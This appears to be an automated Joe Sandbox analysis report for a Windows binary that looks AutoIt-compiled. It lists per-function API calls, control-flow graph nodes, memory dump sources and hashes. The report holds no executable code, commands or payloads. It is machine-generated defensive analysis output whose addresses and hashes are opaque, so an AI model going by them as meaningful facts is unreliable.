                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                            • String ID:
                                                            • API String ID: 1617910340-0
                                                            • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                            • Instruction ID: d17d4117f6267eaac2752025b9db888d81ca4edebdb29b2b01d1f74d157ce3f5
                                                            • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                            • Instruction Fuzzy Hash: 3FC1DE32B18A818AFF10EB64E5813EC7761EB49BA8F481635DE2E5B795CF38D411C720

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 557 7ff75f1525bc-7ff75f15263d 561 7ff75f15287e-7ff75f1528af 557->561 562 7ff75f152643-7ff75f15267c 557->562 563 7ff75f152680-7ff75f152687 562->563 565 7ff75f15268d-7ff75f1526a1 563->565 566 7ff75f152856-7ff75f152876 563->566 568 7ff75f1526a7-7ff75f1526bc 565->568 569 7ff75f19d148-7ff75f19d14f 565->569 566->561 572 7ff75f1529c8-7ff75f1529eb PeekMessageW 568->572 573 7ff75f1526c2-7ff75f1526c9 568->573 570 7ff75f19d155 569->570 571 7ff75f152702-7ff75f152723 569->571 579 7ff75f19d15a-7ff75f19d160 570->579 586 7ff75f15276e-7ff75f1527d2 571->586 587 7ff75f152725-7ff75f15272c 571->587 575 7ff75f1526e8-7ff75f1526ef 572->575 576 7ff75f1529f1-7ff75f1529f5 572->576 573->572 577 7ff75f1526cf-7ff75f1526d4 573->577 583 7ff75f19e285-7ff75f19e293 575->583 584 7ff75f1526f5-7ff75f1526fc 575->584 580 7ff75f1529fb-7ff75f152a05 576->580 581 7ff75f19d1aa-7ff75f19d1bb 576->581 577->572 582 7ff75f1526da-7ff75f1526e2 GetInputState 577->582 588 7ff75f19d162-7ff75f19d176 579->588 589 7ff75f19d19b 579->589 580->579 590 7ff75f152a0b-7ff75f152a1d call 7ff75f162de8 580->590 581->575 582->572 582->575 585 7ff75f19e29d-7ff75f19e2b5 call 7ff75f15f1c4 583->585 584->571 584->585 585->566 628 7ff75f1527d8-7ff75f1527da 586->628 629 7ff75f19e276 586->629 587->586 591 7ff75f15272e-7ff75f152738 587->591 588->589 593 7ff75f19d178-7ff75f19d17f 588->593 589->581 601 7ff75f152a33-7ff75f152a4f PeekMessageW 590->601 602 7ff75f152a1f-7ff75f152a2d TranslateMessage DispatchMessageW 590->602 597 7ff75f15273f-7ff75f152742 591->597 593->589 599 7ff75f19d181-7ff75f19d190 TranslateAcceleratorW 593->599 603 7ff75f152748 597->603 604 7ff75f1528b0-7ff75f1528b7 597->604 599->590 606 7ff75f19d196 599->606 601->575 609 7ff75f152a55 601->609 602->601 610 7ff75f15274f-7ff75f152752 603->610 607 7ff75f1528eb-7ff75f1528ef 604->607 608 7ff75f1528b9-7ff75f1528cc timeGetTime 604->608 606->601 607->597 612 7ff75f19d2ab-7ff75f19d2b0 608->612 613 7ff75f1528d2-7ff75f1528d7 608->613 609->576 614 7ff75f152758-7ff75f152761 610->614 615 7ff75f1528f4-7ff75f1528fb 610->615 617 7ff75f1528dc-7ff75f1528e5 612->617 618 7ff75f19d2b6 612->618 613->617 619 7ff75f1528d9 613->619 622 7ff75f152767 614->622 623 7ff75f19d4c7-7ff75f19d4ce 614->623 620 7ff75f19d2f8-7ff75f19d303 615->620 621 7ff75f152901-7ff75f152905 615->621 617->607 625 7ff75f19d2bb-7ff75f19d2f3 timeGetTime call 7ff75f162ac0 call 7ff75f1c3a28 617->625 618->625 619->617 626 7ff75f19d305 620->626 627 7ff75f19d309-7ff75f19d30c 620->627 621->610 622->586 625->607 626->627 631 7ff75f19d312-7ff75f19d319 627->631 632 7ff75f19d30e 627->632 628->629 633 7ff75f1527e0-7ff75f1527ee 628->633 629->583 636 7ff75f19d322-7ff75f19d329 631->636 637 7ff75f19d31b 631->637 632->631 633->629 635 7ff75f1527f4-7ff75f152819 633->635 641 7ff75f15290a-7ff75f15290d 635->641 642 7ff75f15281f-7ff75f152829 call 7ff75f152b70 635->642 638 7ff75f19d332-7ff75f19d33d call 7ff75f1642a0 636->638 639 7ff75f19d32b 636->639 637->636 638->603 638->623 639->638 645 7ff75f15290f-7ff75f15291a call 7ff75f152e30 641->645 646 7ff75f152931-7ff75f152933 641->646 648 7ff75f15282e-7ff75f152836 642->648 645->648 651 7ff75f152935-7ff75f152949 call 7ff75f1566c0 646->651 652 7ff75f152971-7ff75f152974 646->652 653 7ff75f15283c 648->653 654 7ff75f15299e-7ff75f1529ab 648->654 665 7ff75f15294e-7ff75f152950 651->665 655 7ff75f15297a-7ff75f152997 call 7ff75f1501a0 652->655 656 7ff75f19dfbe-7ff75f19dfc0 652->656 659 7ff75f152840-7ff75f152843 653->659 661 7ff75f19e181-7ff75f19e197 call 7ff75f164c24 * 2 654->661 662 7ff75f1529b1-7ff75f1529be call 7ff75f164c24 654->662 668 7ff75f15299c 655->668 663 7ff75f19dfc2-7ff75f19dfc5 656->663 664 7ff75f19dfed-7ff75f19dff6 656->664 666 7ff75f152b17-7ff75f152b1d 659->666 667 7ff75f152849-7ff75f152850 659->667 661->629 662->572 663->659 671 7ff75f19dfcb-7ff75f19dfe7 call 7ff75f153c20 663->671 672 7ff75f19e005-7ff75f19e00c 664->672 673 7ff75f19dff8-7ff75f19e003 664->673 665->648 674 7ff75f152956-7ff75f152966 665->674 666->667 676 7ff75f152b23-7ff75f152b2d 666->676 667->563 667->566 668->665 671->664 680 7ff75f19e00f-7ff75f19e016 call 7ff75f1d8b98 672->680 673->680 674->648 675 7ff75f15296c 674->675 681 7ff75f19e0f4-7ff75f19e10e call 7ff75f1c34e4 675->681 676->569 688 7ff75f19e0d7-7ff75f19e0d9 680->688 689 7ff75f19e01c-7ff75f19e036 call 7ff75f1c34e4 680->689 694 7ff75f19e110-7ff75f19e11d 681->694 695 7ff75f19e147-7ff75f19e14e 681->695 691 7ff75f19e0df-7ff75f19e0ee call 7ff75f1da320 688->691 692 7ff75f19e0db 688->692 703 7ff75f19e06f-7ff75f19e076 689->703 704 7ff75f19e038-7ff75f19e045 689->704 691->681 692->691 699 7ff75f19e11f-7ff75f19e130 call 7ff75f164c24 * 2 694->699 700 7ff75f19e135-7ff75f19e142 call 7ff75f164c24 694->700 695->667 696 7ff75f19e154-7ff75f19e15a 695->696 696->667 701 7ff75f19e160-7ff75f19e169 696->701 699->700 700->695 701->661 703->667 711 7ff75f19e07c-7ff75f19e082 703->711 708 7ff75f19e047-7ff75f19e058 call 7ff75f164c24 * 2 704->708 709 7ff75f19e05d-7ff75f19e06a call 7ff75f164c24 704->709 708->709 709->703 711->667 715 7ff75f19e088-7ff75f19e091 711->715 715->688
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                            • String ID:
                                                            • API String ID: 3249950245-0
                                                            • Opcode ID: 1488d278e781027eebb232eec22d80ed309101f57f8ed12946040d12c1005b51
                                                            • Instruction ID: 9770ce3237158d106403ccba0d31c1f46285a740f2a88e35b6ff3964732c9d01
                                                            • Opcode Fuzzy Hash: 1488d278e781027eebb232eec22d80ed309101f57f8ed12946040d12c1005b51
                                                            • Instruction Fuzzy Hash: 22228F72A0C6C286EF64AB25F4903F9B7A1EB45784F984136CA4E47695CF3DE441CB60

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 849 7ff75f143cbc-7ff75f143d88 CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$Show
                                                            • String ID: AutoIt v3$d$edit
                                                            • API String ID: 2813641753-2600919596
                                                            • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                            • Instruction ID: 6cf192ba46cbe394447775443fae5fed3f9f54a3039bec00414154dc0e88ec2b
                                                            • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                            • Instruction Fuzzy Hash: C8215CB2A28B8187EB10DB10F4887A9B7A0F788799F954238D68D47694CFBDD145CB20

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00007FF75F162D5C: MapVirtualKeyW.USER32(?,?,?,00007FF75F147FA5), ref: 00007FF75F162D8E
                                                              • Part of subcall function 00007FF75F162D5C: MapVirtualKeyW.USER32(?,?,?,00007FF75F147FA5), ref: 00007FF75F162D9C
                                                              • Part of subcall function 00007FF75F162D5C: MapVirtualKeyW.USER32(?,?,?,00007FF75F147FA5), ref: 00007FF75F162DAC
                                                              • Part of subcall function 00007FF75F162D5C: MapVirtualKeyW.USER32(?,?,?,00007FF75F147FA5), ref: 00007FF75F162DBC
                                                              • Part of subcall function 00007FF75F162D5C: MapVirtualKeyW.USER32(?,?,?,00007FF75F147FA5), ref: 00007FF75F162DCA
                                                              • Part of subcall function 00007FF75F162D5C: MapVirtualKeyW.USER32(?,?,?,00007FF75F147FA5), ref: 00007FF75F162DD8
                                                              • Part of subcall function 00007FF75F15EEC8: RegisterWindowMessageW.USER32 ref: 00007FF75F15EF76
                                                            • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75F14106D), ref: 00007FF75F148209
                                                            • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75F14106D), ref: 00007FF75F14828F
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75F14106D), ref: 00007FF75F18D36A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID: AutoIt
                                                            • API String ID: 1986988660-2515660138
                                                            • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                            • Instruction ID: ddcc5791534676491462a76e720ee215d9d7398871066ee61b01fd1c2706f77f
                                                            • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                            • Instruction Fuzzy Hash: 16C1B6E1D19BDA85EE40EB14B8800F8F7A4BF94758F98023AD54D436A5EF7CA141CB72

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_Stringwcscpy
                                                            • String ID: Line:
                                                            • API String ID: 3135491444-1585850449
                                                            • Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                            • Instruction ID: 852bde05240d7e13d79afaf09e1f7baf3d68ed6d42383b51e5ee307ffb5ff33b
                                                            • Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                            • Instruction Fuzzy Hash: 8A414162A086C696EF20FB20F4442F9A361FB84348FC85431E64D0369AEF7CE648C761
                                                            APIs
                                                            • GetOpenFileNameW.COMDLG32 ref: 00007FF75F18BAA2
                                                              • Part of subcall function 00007FF75F1456D4: GetFullPathNameW.KERNEL32(?,00007FF75F1456C1,?,00007FF75F147A0C,?,?,?,00007FF75F14109E), ref: 00007FF75F1456FF
                                                              • Part of subcall function 00007FF75F143EB4: GetLongPathNameW.KERNELBASE ref: 00007FF75F143ED8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen
                                                            • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                            • API String ID: 779396738-2360590182
                                                            • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                            • Instruction ID: f7d4c244f3abc2fca6ce9970d589bce4069e9b8220c3243a51ec6b2c22c256bd
                                                            • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                            • Instruction Fuzzy Hash: 91312C72A08BC289EB10EB21E8441EDB7A4FB89B84F984135DE8C47B99DF7CD545C760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer$Killwcscpy
                                                            • String ID:
                                                            • API String ID: 3812282468-0
                                                            • Opcode ID: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                            • Instruction ID: 9f855460a3dd269ed1107e0bfe838cfdc8c93a886861b644ebc13619f5d682d1
                                                            • Opcode Fuzzy Hash: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                            • Instruction Fuzzy Hash: 84318162A097C287EF61AB21A1502FDBB98E745F88F9C4035DE8D07749DF2CD64587B0
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF75F146F52,?,?,?,?,?,?,00007FF75F14782C), ref: 00007FF75F146FA5
                                                            • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF75F146F52,?,?,?,?,?,?,00007FF75F14782C), ref: 00007FF75F146FD3
                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF75F146F52,?,?,?,?,?,?,00007FF75F14782C), ref: 00007FF75F146FFA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID:
                                                            • API String ID: 3677997916-0
                                                            • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                            • Instruction ID: 0f87f320c1263a263bfbe9e86d32777f787adb0d097ccce9d75900ca04180d2c
                                                            • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                            • Instruction Fuzzy Hash: 0A219F33A1878187DB10AF15F4549AEB3A4FB89B84B881531DB8D83B14EF3AE815CB54
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                            • Instruction ID: e409a186169d662975d4d36accc2e00bd0e7cd0303689d031c9eab10aec4ebc4
                                                            • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                            • Instruction Fuzzy Hash: E2E07520B047C583EF547B65A8992B9A656AF88B51FD95438C90E06792CF2DE8498270
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID: CALL
                                                            • API String ID: 1385522511-4196123274
                                                            • Opcode ID: 278cfb30bd3ca7767d208b8ebc54255a4a2aa9310e72bb4b170a940d14afb9b0
                                                            • Instruction ID: 9bcff1e2d0df980f1fa260336f748e3441120d6653d29c61073b830065028f0e
                                                            • Opcode Fuzzy Hash: 278cfb30bd3ca7767d208b8ebc54255a4a2aa9310e72bb4b170a940d14afb9b0
                                                            • Instruction Fuzzy Hash: 40227B72B086C18AEF10EF69E0402ECB7A1FB54B88F984136CA4D5B795DF39E455C7A0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                            • Instruction ID: c92d1135bb993e6cbac9f7acab0d6697de954a7238776588a5b8fb78fea38af2
                                                            • Opcode Fuzzy Hash: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                            • Instruction Fuzzy Hash: 43417C72D08B8282FB60BF11F4443BAF7A0AB85BA8F884231DA6D076C5DF3DD4058751
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressFreeProc
                                                            • String ID:
                                                            • API String ID: 2632591731-0
                                                            • Opcode ID: 392ad9f8a410b3ba7add488219b3c7835b0d92f2120495b543ba498714cf74fb
                                                            • Instruction ID: 3f6ef9ce162dfa2233263ab24f9c280305654ce0d38422013b7c6e5507a0d050
                                                            • Opcode Fuzzy Hash: 392ad9f8a410b3ba7add488219b3c7835b0d92f2120495b543ba498714cf74fb
                                                            • Instruction Fuzzy Hash: FC412E22E14A9286EF10FB65E4553FCA3A0AB8478CF894131EA4D47699EF3CD945C760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_
                                                            • String ID:
                                                            • API String ID: 1144537725-0
                                                            • Opcode ID: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                            • Instruction ID: fdcef225c5ee8454447b9c16259fd10816fc843575b9c49ab1f6e2d6c8c651c5
                                                            • Opcode Fuzzy Hash: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                            • Instruction Fuzzy Hash: 4B414A71909BC686EB51EF11F4443A9B3A4FB48B88F880139DA4C07799DF7CE654C720
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 00007FF75F143756
                                                              • Part of subcall function 00007FF75F169334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75F169348
                                                              • Part of subcall function 00007FF75F1436E8: SystemParametersInfoW.USER32 ref: 00007FF75F143705
                                                              • Part of subcall function 00007FF75F1436E8: SystemParametersInfoW.USER32 ref: 00007FF75F143725
                                                              • Part of subcall function 00007FF75F1437B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F1437F2
                                                              • Part of subcall function 00007FF75F1437B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F143807
                                                              • Part of subcall function 00007FF75F1437B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F14388D
                                                              • Part of subcall function 00007FF75F1437B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F143924
                                                            • SystemParametersInfoW.USER32 ref: 00007FF75F143797
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 4207566314-0
                                                            • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                            • Instruction ID: fb59efc9269a051c30e924638568110cb652b99d7dbd19a431f2b9559cd232cc
                                                            • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
